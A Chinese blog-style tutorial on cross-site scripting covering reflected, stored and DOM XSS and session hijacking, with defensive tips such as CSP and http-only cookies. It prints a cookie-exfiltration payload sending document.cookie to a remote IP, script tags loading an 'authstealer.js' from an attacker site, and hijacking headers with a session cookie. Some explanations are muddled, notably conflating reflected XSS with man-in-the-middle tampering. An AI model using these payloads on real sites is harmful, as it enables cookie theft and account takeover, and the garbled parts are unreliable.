xss 攻击原理
XSS 原名周树人浙江李大钊,XSS其实不是XSS,是CSS避免和CSS3重名,改名叫XSS(Cross site Scripting)。
1、攻击的原理是什么?
一段坏人写的代码在你的浏览器上解释执行!!
里面浏览器标签的一些特性,让用户无意间执行已经被添加的恶意代码,就能浏览器做一些有攻击性的行为。
XSS 分类
- 反射形 xss
- 存储形 xss
- dom形 xss
1.1、反射形 xss
使用query请求,如果访问一段html代码或js脚本,服务端响应数据返回给客户端,客户端执行代码,这样还不算是xss,再形象一些
如果请求是恶意发给中间服务,中间服务做一些修改,再把它返回给其他的页面请求,网站就变成了风险网站,原因是网站内容被恶意篡改。
此时就需要https加密,中间服务器拿到消息也看不懂,或者csp策略,防止html代码被篡改。
Refused to execute inline event handler because it violates the following Content Security Policy directive: "script-src 'strict-dynamic'
const arr = ['1', '2', '3', '<img src="11" onerror="console.log(window.localStorage)" />'] const t = document.querySelector('#t') arr.forEach(item => { const p = document.createElement('p') p.innerHTML = item t.append(p) // 正常操作是插入的节点会执行onerror });
document.write("<img src='http://192.168.59.129:10086?c=" + escape(document.cookie) + "'>")
现代浏览器CSP文档安全策略的限制说明: https://www.cnblogs.com/the-last/p/11437732.html
1.2、反射型xss
也称非持续型,单次操作攻击,维基百科描述了一个这样的故事:
Alice经常访问一个网站,这个网站是Bob的,他允许Alice用用户名密码登录,而且会有敏感信息,用户登录后浏览器会保持认证状态,服务端和客户端都有Alice登录的记录。
有一天,Mallory发现Bob的网站有易遭攻击的风险。
Mallory在网站的主页,填写表单并提及,会有一个这样的URL:http://bobssite.org/search?q=her%20search%20term。
在网站不能响应请求时,会返回:xxx not found,比如:http://bobssite.org/search?q=puppies,返回 puppies not found。
Mallory将输入换成了HTML字符串,如:'<script type='application/javascript'>alert('xss');</script>'
这样服务器返回给客户端,会在页面插入这个标签并执行,客户端会出现弹框,内容是:xss。
Mallory进一步修改传参,把puppies改成了恶意脚本的链接,http://bobssite.org/search?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js"></script>
客户端解析这个返回值,就会创建script标签,请求并执行恶意脚本,网站就被攻击了。
Mallory进一步把链接加密成不易被发现的格式:
http://bobssite.org/search?q=puppies%3Cscript%2520src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
Mallory把这个链接用e-mail给了Alice,Alice看到是Bob的网站,就点开了只是返回一个puppies not found,也并没有在意,单此时Alice的浏览器上的cookie信息交易信息,Mallory都已经能获取到了因为有恶意脚本执行,
开始冒充用户认证实施破坏。
那应该如何避免这样的违法的事情发生呢?
- 网站的输入,禁止输入一些敏感的字符,如:link、script、iframe
- 服务端设置无效访问的重定向
- 服务端查明和验证会话信息是否有效
- 网站只展示输入查询信息的最后几位
- 网站可以要求用户再次输入密码,在修改访问信息之前
- 网站使用 https://www.cnblogs.com/the-last/p/11437732.html 文档安全策略
- 设置 cookie为 http-only,不可被脚本修改。
1.3、存储型xss
存储形和反射行攻击的区别是,储存行会把提交的代码存储到服务器端,如文件系统,sql。下次攻击的时候就不需要再提交代码。
再看一个维基百科上的故事!
Mallory在Bob的网站上注册账户,Bob的网站可以留言
提交留言会展示在评论区,每个人都可以看到
Mallory给Bob的网站加了一句这样的留言,I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js">
当其他用户看到评论有个链接,点击这个链接就会发生xss攻击,链接是恶意代码的下载地址。
这样的攻击就是一个持久化的xss。
敏感的带有网络请求的标签有这样几种,在输入时进行语法过滤!
<script> <link> <iframe> <img> <style>
1.4、会话劫持
如何会话劫持呢?
受害者与正常服务器的会话被黑客从中间劫持,受害者误以为是访问了安全的服务器,安全服务器以为是用户在访问。
在请求的 http header 中添加如下头信息。
xssheaders = { 'Host': 'www.xsslabelgg.com', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0', 'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-GB,en;q=0.5', 'Accept-Encoding': 'json, text, gzip, deflate', 'Referer': 'http://www.xsslabelgg.com/profile/hackbiji', 'Cookie': 'particle=hgb32s34ekr20kdq6ttje8dct0', 'Connection': 'keep-alive', }
这样黑客获取到信息就能代替受害者,正常访问服务器。